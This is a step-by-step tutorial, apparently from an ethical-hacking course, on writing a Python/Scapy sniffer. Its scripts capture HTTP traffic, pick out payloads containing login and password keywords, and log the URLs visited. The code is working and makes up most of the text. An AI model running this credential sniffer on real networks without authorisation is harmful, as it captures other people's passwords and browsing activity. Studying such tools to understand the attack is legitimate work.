  • Python Ethical Hacking

    PACKET_SNIFFER

    • Capture data flowing through an interface.
    • Filter this data.
    • Display interesting information such as:
      • Login info (username & password).
      • Visited websites.
      • Images.
      • etc.

    CAPTURE & FILTER DATA

    • Scapy provides a sniff() function.
    • It can capture data sent to/from a given interface (iface).
    • It can call a function passed via prn on each captured packet (see the minimal sketch after this list).
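
    A minimal sketch of the sniff()/prn mechanism on its own, before any HTTP filtering is added (the interface name "eth0" here is just an example):

    import scapy.all as scapy

    def show_summary(packet):
        # sniff() calls this once for every captured packet.
        print(packet.summary())

    # store=False avoids keeping every packet in memory; prn is the per-packet callback.
    scapy.sniff(iface="eth0", store=False, prn=show_summary)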

    Install the third-party scapy_http package (note that recent Scapy releases, 2.4.3 and later, also ship an HTTP layer natively as scapy.layers.http, which the scripts below import):

     pip install scapy_http

    1. Write a Python script that sniffs HTTP requests and dumps any packet that carries a Raw payload.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    def sniff(interface):
        # store=False: don't keep packets in memory; prn: callback run on each packet.
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        # Only look at HTTP requests that actually carry a payload.
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.Raw):
                packet.show()
    
    sniff("eth0")

    Execute the script (as root, since packet capture needs raw-socket access) and sniff the packets on eth0.

    2. Filter the output down to the useful part of each packet: the Raw payload.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.Raw):
                # Print only the application-layer payload instead of the whole packet.
                print(packet[scapy.Raw].load)
    
    sniff("eth0")

     Execute the script and sniff the packets on eth0.
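
    Note that packet[scapy.Raw].load is a bytes object under Python 3, so it prints with a b'...' prefix; the next revision decodes it before searching for keywords. A tiny illustration with a made-up payload:

    load = b"username=admin&password=1234"  # hypothetical payload, for illustration only
    print(load)                             # b'username=admin&password=1234'
    print(load.decode(errors='ignore'))     # username=admin&password=1234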

    3. Rewrite the script to search the payload for credential-related keywords.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    
    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.Raw):
                # The Raw load is bytes; decode it so the substring search works on str.
                load = packet[scapy.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")

    4. Add a feature: extract the requested URL from each HTTP request.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    
    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            # Host and Path are bytes fields; decode them for readable output.
            url = (packet[HTTPRequest].Host + packet[HTTPRequest].Path).decode(errors='ignore')
            print(url)
    
            if packet.haslayer(scapy.Raw):
                load = packet[scapy.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")
